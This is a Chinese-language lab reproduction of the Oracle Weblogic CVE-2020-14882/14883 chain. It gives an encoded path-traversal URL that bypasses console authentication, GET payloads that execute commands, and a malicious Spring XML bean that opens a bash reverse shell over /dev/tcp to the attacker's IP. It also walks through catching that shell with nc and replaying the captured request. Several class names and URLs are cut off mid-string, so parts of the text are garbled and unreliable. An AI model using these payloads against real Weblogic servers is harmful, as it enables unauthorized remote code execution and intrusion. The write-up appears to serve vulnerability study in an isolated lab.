Weblogic未授权远程命令执⾏漏洞(CVE-2020-14882CVE-2020-14。。。
Weblogic是Oracle公司推出的J2EE应⽤服务器,CVE-2020-14882允许未授权的⽤户绕过管理控制台的权限验证访问后
台,CVE-2020-14883允许后台任意⽤户通过HTTP协议执⾏任意命令。使⽤这两个漏洞组成的利⽤链,可通过⼀个GET请求在远程Weblogic服务器上以未授权的任意⽤户⾝份执⾏命令。
本次实验⽤到三个虚拟机
攻击机:Kali      ip:192.168.222.131
环境机:Ubantu    ip:192.168.222.128
Xml挂载:windows 7  ip:192.168.222.130(这个好像⽹上也有⾃⼰⽤起⼀个也⾏)
  Ubantu  Vulhub
Docker启动
10.3.6.0.0,
12.1.3.0.0,
12.2.1.3.0,
12.2.1.4.0,
14.1.1.0.0
访问:
192.168.222.128:7001/console/css/%252e%252e%252fconsole.portal
未授权复现完成。
远程命令执⾏:
192.168.99.100:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=
&handle=herence.mvel2.sh.ShellSession("java.lang.Ru touch /tmp/success1    //替换其他命令
反弹shell
这个利⽤⽅法只能在Weblogic 12.2.1以上版本利⽤,因为10版本并不存在herence.mvel2.sh.ShellSession 类,使⽤t.support.FileSystemXmlApplicationContext类时,需要构造⼀
个恶意的xml⽂件。
<beans xmlns="/schema/beans" xmlns:xsi="/2001/XMLSchema-instance" xsi:schemaLocation="www.springframewo <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>-c</value>
<value>/bin/bash</value>
<value><![CDATA[bash -i >& /dev/tcp/192.168.222.131/8888 0>&1]]></value>
</list>
</constructor-arg>
cve漏洞库</bean>
</beans>
Poc:
ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=t.support.FileSystemXml 如果⽤到弹shell需要⾃⼰替换⼀下xml弹shell命令
访问抓包
然后⽤kali  nc监听8888
在将获取的数据包repeater重放
Poc整理:
反弹shell :
ip+端⼝/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=t.support.FileSystemXmlApplic 需要l⽂件。修改⽂件内的命令
未授权:
192.168.99.100:7001/console/css/%252e%252e%252fconsole.portal
命令执⾏:
192.168.99.100:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=herence.mvel2.sh.ShellSession("java.lang.Ru
这⾥执⾏的
touch%20/tmp/success1

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。